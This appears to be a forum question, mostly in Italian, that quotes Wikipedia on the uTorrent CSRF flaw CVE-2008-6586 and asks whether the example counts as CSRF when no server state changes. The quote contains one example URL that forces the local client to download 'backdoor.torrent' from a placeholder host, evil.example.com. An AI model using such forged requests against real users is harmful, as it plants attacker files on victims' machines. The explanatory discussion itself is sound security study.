Da Wikipedia:
A real CSRF vulnerability in uTorrent (CVE-2008-6586) exploited the fact that its web console accessible at localhost:8080 allowed mission-critical actions to be executed as a matter of simple GET request:
Force a .torrent file download http://localhost:8080/gui/?action=add-url&s=http://evil.example.com/backdoor.torrent
uTorrent's web interface used GET request for critical state-changing operations (change credentials, download a file etc.)
Per quanto ne so, "CSRF attacca le funzionalità di destinazione che causano uno stato del server." (OWASP). Tuttavia, l'attacco CSRF nell'esempio sopra riportato in Wikipedia non modifica affatto lo stato del server. Solo un client uTorrent può scaricare un file dal sito dannoso.
Quindi l'esempio è un vero attacco CSRF?